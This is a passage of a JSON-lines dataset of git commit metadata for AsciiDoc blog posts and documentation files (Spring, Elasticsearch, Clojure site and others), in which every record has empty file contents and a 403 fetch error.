2015-08-10-Github.adoc","repos":"LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,AlonsoCampos\/AlonsoCampos.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,AlonsoCampos\/AlonsoCampos.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,Rackcore\/Rackcore.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Rackcore\/Rackcore.github.io,LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io,AlonsoCampos\/AlonsoCampos.github.io,Growth-Hacking-Marketing\/Growth-Hacking-Marketing.github.io,Desarrollo-FullStack\/Desarrollo-FullStack.github.io,Rackcore\/Rackcore.github.io","old_file":"_posts\/2015-08-10-Github.adoc","new_file":"_posts\/2015-08-10-Github.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LenguajesdeProgramacion-AlonsoCampos\/LenguajesdeProgramacion-AlonsoCampos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db7b4bd19daadc2c1cc33c3ccc06f7b7e3436ea4","subject":"Update 2016-10-24-Now-Prove-It.adoc","message":"Update 2016-10-24-Now-Prove-It.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-10-24-Now-Prove-It.adoc","new_file":"_posts\/2016-10-24-Now-Prove-It.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f8299af9baea9be1ce6d60b211ecae774d7c1d4","subject":"Update 2016-03-13-C-multithreading.adoc","message":"Update 2016-03-13-C-multithreading.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/2016-03-13-C-multithreading.adoc","new_file":"_posts\/2016-03-13-C-multithreading.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chbailly\/chbailly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8af127d5a1298985c60b672d4e4a85555cd5642b","subject":"Update 2016-04-06-Rompiendo-sistemas.adoc","message":"Update 2016-04-06-Rompiendo-sistemas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Rompiendo-sistemas.adoc","new_file":"_posts\/2016-04-06-Rompiendo-sistemas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85c18a741081f86e9acf7a442e299f213ed084c2","subject":"Add common-dependencyMicronautHttpClient.adoc","message":"Add common-dependencyMicronautHttpClient.adoc","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-dependencyMicronautHttpClient.adoc","new_file":"src\/main\/docs\/common-dependencyMicronautHttpClient.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"987ad236138f2aafd491fb689de44285ea005074","subject":"Create README.adoc","message":"Create README.adoc","repos":"aparnachaudhary\/dockerfiles","old_file":"wildfly-dc\/README.adoc","new_file":"wildfly-dc\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aparnachaudhary\/dockerfiles.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cb401831df5b5ea5c5796d00e873fc383ad37c3b","subject":"Update 2016-03-02-Hubpress.adoc","message":"Update 2016-03-02-Hubpress.adoc","repos":"YJSoft\/yjsoft.github.io,YJSoft\/yjsoft.github.io,YJSoft\/yjsoft.github.io,YJSoft\/yjsoft.github.io","old_file":"_posts\/2016-03-02-Hubpress.adoc","new_file":"_posts\/2016-03-02-Hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YJSoft\/yjsoft.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7537aa5124e4f6d74820449311e50da6ade10f16","subject":"Add generic authorization page","message":"Add generic authorization page\n","repos":"spring-projects\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,rwinch\/spring-security,rwinch\/spring-security,spring-projects\/spring-security","old_file":"docs\/modules\/ROOT\/pages\/features\/authorization\/index.adoc","new_file":"docs\/modules\/ROOT\/pages\/features\/authorization\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db61d320117f96555d679921ebdd65c20261650a","subject":"Update 2018-03-10-Azure-10.adoc","message":"Update 2018-03-10-Azure-10.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-10-Azure-10.adoc","new_file":"_posts\/2018-03-10-Azure-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc35ff974ebc7cfc78f6deb21df716da6ebf7bf7","subject":"Update 2018-09-04-vr-comic.adoc","message":"Update 2018-09-04-vr-comic.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-04-vr-comic.adoc","new_file":"_posts\/2018-09-04-vr-comic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cea081bdc76da3df8d8e7ac0ac732f63bca931e1","subject":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","message":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88bd708387bd1b9acaa4b02f72c7aed5e34a11fe","subject":"y2b create post BLACK FRIDAY \\\/ CYBER MONDAY DEALS 2013!","message":"y2b create post BLACK FRIDAY \\\/ CYBER MONDAY DEALS 2013!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-11-28-BLACK-FRIDAY--CYBER-MONDAY-DEALS-2013.adoc","new_file":"_posts\/2013-11-28-BLACK-FRIDAY--CYBER-MONDAY-DEALS-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7acf83576d3008d31a8fc7e329a8a4632bb2d4d9","subject":"Publish DS_Store-Breizhcamp-Saison-Breizhcamp-Saison-5.adoc","message":"Publish DS_Store-Breizhcamp-Saison-Breizhcamp-Saison-5.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"DS_Store-Breizhcamp-Saison-Breizhcamp-Saison-5.adoc","new_file":"DS_Store-Breizhcamp-Saison-Breizhcamp-Saison-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d0a5bd40f7162219086fba60a81a2391a67dd2e","subject":"Add section on admission policies (#322)","message":"Add section on admission policies (#322)\n\n* Add section on admission policies\r\n\r\nKubernetes admission policies are those enforced when new\r\nresources are created, updated, or deleted.\r\nThis tutorial describes admission control and how to impose\r\norganization-specific policies at admission-time, using\r\nthe OpenPolicyAgent.\r\n\r\n* Fix pod apiVersion key name\r\n\r\n* Address comments\r\n\r\n* More fixes\r\n\r\n* A front-to-back editing pass\r\n\r\n* Address comments from Chris\r\n","repos":"dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop","old_file":"admission-policy\/readme.adoc","new_file":"admission-policy\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dalbhanj\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab6f93fa935b7a39aa1572d03b3fdfd35f856521","subject":"port Creating Tickets page from wiki","message":"port Creating Tickets page from wiki\n","repos":"clojure\/clojure-site","old_file":"content\/community\/creating_tickets.adoc","new_file":"content\/community\/creating_tickets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"14a7931fc294c610a7dced81f9ef33bbad39415d","subject":"y2b create post The Smallest, Fastest Storage EVER?","message":"y2b create post The Smallest, Fastest Storage EVER?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-02-08-The-Smallest-Fastest-Storage-EVER.adoc","new_file":"_posts\/2016-02-08-The-Smallest-Fastest-Storage-EVER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d739932e3b0c92f09bc67fc832dc26ac41b1c0c","subject":"Adds ClojureBridge Buenos Aires","message":"Adds ClojureBridge Buenos Aires\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2017\/clojurebridge-ba.adoc","new_file":"content\/events\/2017\/clojurebridge-ba.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5379f4cc6ab5a160b595a0d418f4cbc03e318493","subject":"adds index document for categorized features","message":"adds index document for categorized features\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"tck\/index.adoc","new_file":"tck\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ba601895fac2e8df042b99146bb088558ff03525","subject":"Update 2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","message":"Update 2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_file":"_posts\/2017-09-01-E-C2-Spring-Boot-L-I-N-E-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a83c25a7cd4ecbb91ac905e70928e094713f8697","subject":"y2b create post THE CRAZIEST HEADPHONES EVER","message":"y2b create post THE CRAZIEST HEADPHONES EVER","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-21-THE-CRAZIEST-HEADPHONES-EVER.adoc","new_file":"_posts\/2017-12-21-THE-CRAZIEST-HEADPHONES-EVER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b84c92263fd5da427335e7bcb8b65f564596efbb","subject":"Update 2017-02-06-Improving-percentile-latencies-in-Chronicle-Queue.adoc","message":"Update 2017-02-06-Improving-percentile-latencies-in-Chronicle-Queue.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2017-02-06-Improving-percentile-latencies-in-Chronicle-Queue.adoc","new_file":"_posts\/2017-02-06-Improving-percentile-latencies-in-Chronicle-Queue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63a8ddf996380cc6b00658b0ce9ec35232f4eaaf","subject":"y2b create post Did Apple Just Cancel The iPhone X?","message":"y2b create post Did Apple Just Cancel The iPhone X?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-24-Did%20Apple%20Just%20Cancel%20The%20iPhone%20X%3F.adoc","new_file":"_posts\/2018-01-24-Did%20Apple%20Just%20Cancel%20The%20iPhone%20X%3F.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0c70196833f160ddb7d22838b8db5ee45d17dd7","subject":"Readme updated","message":"Readme updated\n","repos":"Maarc\/windup-as-a-service,Maarc\/windup-as-a-service,Maarc\/windup-as-a-service,Maarc\/windup-as-a-service","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Maarc\/windup-as-a-service.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"654b67e3438f1c898468741625f656ed850f35e6","subject":"Update 2016-10-26-I-did-a-thing.adoc","message":"Update 2016-10-26-I-did-a-thing.adoc","repos":"willyb321\/willyb321.github.io,willyb321\/willyb321.github.io,willyb321\/willyb321.github.io,willyb321\/willyb321.github.io","old_file":"_posts\/2016-10-26-I-did-a-thing.adoc","new_file":"_posts\/2016-10-26-I-did-a-thing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willyb321\/willyb321.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0063b66a738537737490b73022f4f474b3aa118c","subject":"1st version of architecture.adoc","message":"1st version of architecture.adoc\n","repos":"emender\/emender-jenkins,emender\/emender-jenkins","old_file":"doc\/architecture.adoc","new_file":"doc\/architecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/emender\/emender-jenkins.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"44a9d7ac78119545db42d21682c4e310fee46aa2","subject":"Update 2015-07-09-Alpha-version-of-Visjs-Timeline-plugin-for-WordPress.adoc","message":"Update 2015-07-09-Alpha-version-of-Visjs-Timeline-plugin-for-WordPress.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2015-07-09-Alpha-version-of-Visjs-Timeline-plugin-for-WordPress.adoc","new_file":"_posts\/2015-07-09-Alpha-version-of-Visjs-Timeline-plugin-for-WordPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6ce9c0820279b42028dce4ad446cf12951d24af","subject":"formatting for the literal text \"C++\"","message":"formatting for the literal text \"C++\"\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a022e3f8173d0564fa7adce90192338932ce1537","subject":"Update 2016-09-11-Have-fun-with-Cloud-Flare-Slack-Bot.adoc","message":"Update 2016-09-11-Have-fun-with-Cloud-Flare-Slack-Bot.adoc","repos":"locnh\/locnh.github.io,locnh\/locnh.github.io,locnh\/locnh.github.io,locnh\/locnh.github.io","old_file":"_posts\/2016-09-11-Have-fun-with-Cloud-Flare-Slack-Bot.adoc","new_file":"_posts\/2016-09-11-Have-fun-with-Cloud-Flare-Slack-Bot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/locnh\/locnh.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6301a59db31f33b38d3a46f0a02c353f93e436b0","subject":"Update 2018-04-02-.adoc","message":"Update 2018-04-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-02-.adoc","new_file":"_posts\/2018-04-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d135d474622e6248f9b5726f249a915928687d70","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"079dfbf6ed84b8f6fbdeeb08b3c4e2b8303c8a24","subject":"update final report","message":"update final report\n","repos":"juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017","old_file":"_posts\/2017-08-25-final_report.adoc","new_file":"_posts\/2017-08-25-final_report.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juhuntenburg\/gsoc2017.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb5bdeb6470f058bcd19c3e0d8ef826526615965","subject":"Update 2019-01-31-till20170307.adoc","message":"Update 2019-01-31-till20170307.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"_posts\/2019-01-31-till20170307.adoc","new_file":"_posts\/2019-01-31-till20170307.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f71c53095e7d84dc1126135bd51efd30ebc55d11","subject":"Change list to danish","message":"Change list to danish\n","repos":"laosdirg\/base,laosdirg\/base,laosdirg\/base","old_file":"docs\/docker.asciidoc","new_file":"docs\/docker.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/laosdirg\/base.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60f0c66cc4940d2d23ca68874c659ef610062d01","subject":"y2b create post $50,000 Racing Simulator -- Thrustmaster T500RS (CES 2013)","message":"y2b create post $50,000 Racing Simulator -- Thrustmaster T500RS (CES 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-12-50000-Racing-Simulator--Thrustmaster-T500RS-CES-2013.adoc","new_file":"_posts\/2013-01-12-50000-Racing-Simulator--Thrustmaster-T500RS-CES-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6854202e8a6ed940165caca4717a26d8c6eed010","subject":"Rmq about web.xml","message":"Rmq about web.xml\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Maven.adoc","new_file":"Best practices\/Maven.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b33601aef3e378e87bbb9fa3c74c26afabf791db","subject":"Create Web-patterns.adoc","message":"Create Web-patterns.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"Web-patterns.adoc","new_file":"Web-patterns.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"86f612ae3a6c4a23a22d4b246d83e2da0c288801","subject":"[DOCS] Fixed link to Analyze API","message":"[DOCS] Fixed link to Analyze API\n\nOriginal commit: elastic\/x-pack-elasticsearch@e203d839c213052e5e761a533e66c8f45ba2ba25\n","repos":"scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/en\/rest-api\/ml\/jobresource.asciidoc","new_file":"docs\/en\/rest-api\/ml\/jobresource.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aa12763eba84f4eb25ec20e65201dd847101a67f","subject":"Docs: Remove invalid configuration options","message":"Docs: Remove invalid configuration options\n\nOriginal commit: elastic\/x-pack-elasticsearch@c1ef6dce5fe721d01b5deacc0934aee3ee1c103b\n","repos":"robin13\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch","old_file":"docs\/en\/watcher\/actions\/hipchat.asciidoc","new_file":"docs\/en\/watcher\/actions\/hipchat.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"84133c86fec0145bf4cbdc6acb5664c9f10632e6","subject":"Update SockJS overview section and polish","message":"Update SockJS overview section and polish\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/asciidoc\/index.adoc","new_file":"src\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7cd615c4f9da6ec0e4df17629a358bd5f2001b3d","subject":"Document automatic discovery of default TELs","message":"Document automatic discovery of default TELs\n\nThis commit introduces a new \"TestExecutionListener registration and\nordering\" section in the Testing chapter of the reference manual.\n\nIssue: SPR-12082\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/asciidoc\/index.adoc","new_file":"src\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6e5b2d18f0cc4e2d3d3a63aff90abb8ab0334a8f","subject":"Update 2016-11-14-231000-Monday.adoc","message":"Update 2016-11-14-231000-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-14-231000-Monday.adoc","new_file":"_posts\/2016-11-14-231000-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47986daae168e80c8295be55a319032590e6b0dc","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdb497a47bc3f1c0fd0c6057c5868e16233b4b72","subject":"y2b create post Google Has Been Recording Your Voice","message":"y2b create post Google Has Been 